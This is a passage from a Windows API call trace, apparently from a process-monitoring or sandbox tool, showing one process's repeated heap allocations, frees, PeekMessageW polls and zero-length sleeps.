Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.908] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.908] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.908] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.908] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed94c0 [0273.908] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33b98 [0273.908] Sleep (dwMilliseconds=0x0) [0273.908] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed94c0 | out: hHeap=0xcc0000) returned 1 [0273.908] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33b98 | out: hHeap=0xcc0000) returned 1 [0273.908] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.908] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.908] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.908] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.908] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.908] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.908] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.908] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.908] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.909] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.909] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x38) returned 0xf40e00 [0273.909] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.909] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf40e00 | out: hHeap=0xcc0000) returned 1 [0273.909] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.909] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.909] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.909] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.909] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.909] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed94c0 [0273.909] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33b98 [0273.909] Sleep (dwMilliseconds=0x0) [0273.909] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed94c0 | out: hHeap=0xcc0000) returned 1 [0273.909] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33b98 | out: hHeap=0xcc0000) returned 1 [0273.909] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.909] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.909] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.909] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.909] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.909] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.909] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.909] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.909] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.909] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.909] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x38) returned 0xf40e00 [0273.909] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.910] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf40e00 | out: hHeap=0xcc0000) returned 1 [0273.910] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.910] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.910] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.910] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.910] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.910] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed94c0 [0273.910] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33b98 [0273.910] Sleep (dwMilliseconds=0x0) [0273.910] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed94c0 | out: hHeap=0xcc0000) returned 1 [0273.910] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33b98 | out: hHeap=0xcc0000) returned 1 [0273.910] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.910] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.910] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.910] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.910] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.910] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.910] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.910] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.910] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.910] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.910] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x38) returned 0xf40e00 [0273.910] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.910] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf40e00 | out: hHeap=0xcc0000) returned 1 [0273.910] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.910] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.911] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.911] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.911] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.911] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed94c0 [0273.911] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33b98 [0273.911] Sleep (dwMilliseconds=0x0) [0273.911] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed94c0 | out: hHeap=0xcc0000) returned 1 [0273.911] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33b98 | out: hHeap=0xcc0000) returned 1 [0273.911] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.911] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.911] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.911] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.911] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.911] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.911] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.911] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.911] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.911] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.911] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x38) returned 0xf40e00 [0273.911] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.911] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf40e00 | out: hHeap=0xcc0000) returned 1 [0273.911] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.911] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.911] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.911] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.911] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.912] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed94c0 [0273.912] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33b98 [0273.912] Sleep (dwMilliseconds=0x0) [0273.912] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed94c0 | out: hHeap=0xcc0000) returned 1 [0273.912] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33b98 | out: hHeap=0xcc0000) returned 1 [0273.912] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.912] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.912] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.912] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.912] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.912] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.912] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.912] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.912] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.912] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.912] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x38) returned 0xf40e00 [0273.912] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.912] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf40e00 | out: hHeap=0xcc0000) returned 1 [0273.912] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.912] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.912] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.912] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.912] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.912] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed94c0 [0273.912] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33b98 [0273.913] Sleep (dwMilliseconds=0x0) [0273.913] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed94c0 | out: hHeap=0xcc0000) returned 1 [0273.913] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33b98 | out: hHeap=0xcc0000) returned 1 [0273.913] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.913] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.913] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.913] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.913] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.913] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.913] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.913] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.913] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.913] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.913] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x38) returned 0xf40e00 [0273.913] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.913] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf40e00 | out: hHeap=0xcc0000) returned 1 [0273.913] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.913] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.913] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.913] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.913] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.913] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed94c0 [0273.913] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33b98 [0273.914] Sleep (dwMilliseconds=0x0) [0273.914] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed94c0 | out: hHeap=0xcc0000) returned 1 [0273.914] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33b98 | out: hHeap=0xcc0000) returned 1 [0273.914] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.914] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.914] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.914] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.914] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.914] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.914] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.914] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.914] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.914] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.914] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x38) returned 0xf40e00 [0273.914] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.914] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf40e00 | out: hHeap=0xcc0000) returned 1 [0273.914] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.914] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.914] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.914] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.914] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.914] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed94c0 [0273.914] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33b98 [0273.914] Sleep (dwMilliseconds=0x0) [0273.914] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed94c0 | out: hHeap=0xcc0000) returned 1 [0273.915] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33b98 | out: hHeap=0xcc0000) returned 1 [0273.915] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.915] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.915] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.915] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.915] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.915] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.915] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.915] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.915] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.915] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.915] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x38) returned 0xf40e00 [0273.915] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.915] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf40e00 | out: hHeap=0xcc0000) returned 1 [0273.915] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.915] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.915] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.915] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.915] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.915] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed94c0 [0273.915] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33b98 [0273.915] Sleep (dwMilliseconds=0x0) [0273.915] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed94c0 | out: hHeap=0xcc0000) returned 1 [0273.915] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33b98 | out: hHeap=0xcc0000) returned 1 [0273.916] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.916] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.916] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.916] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.916] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.916] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.916] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.916] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.916] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.916] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.916] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x38) returned 0xf40e00 [0273.916] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.916] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf40e00 | out: hHeap=0xcc0000) returned 1 [0273.916] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.916] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.916] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.916] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.916] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.916] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed94c0 [0273.916] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33b98 [0273.916] Sleep (dwMilliseconds=0x0) [0273.916] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed94c0 | out: hHeap=0xcc0000) returned 1 [0273.916] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33b98 | out: hHeap=0xcc0000) returned 1 [0273.916] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.917] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.917] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.917] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.917] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.917] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.917] 